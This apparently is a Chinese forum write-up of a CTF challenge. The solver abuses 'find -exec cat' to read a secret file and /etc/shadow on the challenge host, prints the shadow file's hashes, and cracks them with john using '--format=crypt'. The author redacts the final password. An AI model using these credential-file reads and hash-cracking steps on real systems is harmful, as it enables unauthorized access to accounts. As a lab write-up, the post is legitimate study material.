q1jun的小秘密

# q1jun的小秘密 首先打开题目发现是ssh  直接使用ssh连接 ```bash ssh q1jun@challenge.qsnctf.com -p 10573 ``` 连接上以后查看目录下有什么文件，发现有个hint.txt直接打开 ```bash [q1jun@88a4888ada5f ~]$ ls hint.txt [q1jun@88a4888ada5f ~]$ cat hint.txt 哎呀，居然被你进入了服务器后台，可惜q1jun的安全意识很高，你什么权限都没有，你能发现q1jun藏在电 脑里面的小秘密吗？（我才不会告诉你是在/root/q1jun/里面呢 [q1jun@88a4888ada5f ~]$ ``` 给了提示说是在/root/q1jun/，使用find来看下这个目录下的文件  可以看到有个secret，尝试读取 ```bash find /root/q1jun/ -exec cat /root/q1jun/secret \; ```  发现最底下有个base64编码的，拿去解码 `flag= qsnctf{root用户密码_Do_Y0u_p1ay_b4sketba11}` 找一下看能不能读取shadow ```bash find /etc/ -exec cat /etc/shadow \; ``` 成功拿到shadow ```bash root<img src="static/image/smiley/default/shy.gif" smilieid="8" border="0" alt="" />y$j9T$mLTXNdN0Cezg3K/A2Gbmq1$679lUKHVrO7gt3vfYluTduAq2h7yoHiw45U0Kzmi9v4:19275:0:99999:7::: bin:*:19014:0:99999:7::: daemon:*:19014:0:99999:7::: adm:*:19014:0:99999:7::: lp:*:19014:0:99999:7::: sync:*:19014:0:99999:7::: shutdown:*:19014:0:99999:7::: halt:*:19014:0:99999:7::: mail:*:19014:0:99999:7::: operator:*:19014:0:99999:7::: games:*:19014:0:99999:7::: ftp:*:19014:0:99999:7::: nobody:*:19014:0:99999:7::: tss:!!:19118:::::: dbus:!!:19275:::::: systemd-network:!*:19275:::::: systemd-oom:!*:19275:::::: systemd-resolve:!*:19275:::::: sshd:!!:19275:::::: q1jun<img src="static/image/smiley/default/shy.gif" smilieid="8" border="0" alt="" />y$j9T$V07sLH7xyIzJQkfgoOmAb/$7OeSDTF8qqLEY.h2nfNaBY9L3I2x3PBr1rYxqBZFI/9:19275:0:99999:7::: ``` 然后使用john爆破，爆破途中遇到一个问题 ```bash ┌──(kali㉿kali)-[~/Desktop] └─$ john --wordlist=pass.txt --rules 1111.txt Using default input encoding: UTF-8 No password hashes loaded (see FAQ) ``` 解决办法是要指定format参数 原因是，如果查看合并后文件并在用户名后面看到 **$y$**，则表明密码已使用 yescrypt 进行哈希处理。 然后就可以爆破了  命令是 ```bash sudo john --format=crypt --wordlist=pass.txt --rules 1111.txt ``` 爆破得到密码是"xxxx"得到flag flag就是qsnctf{"xxxx"_Do_Y0u_p1ay_b4sketba11}             

昨晚就差密码破解这一步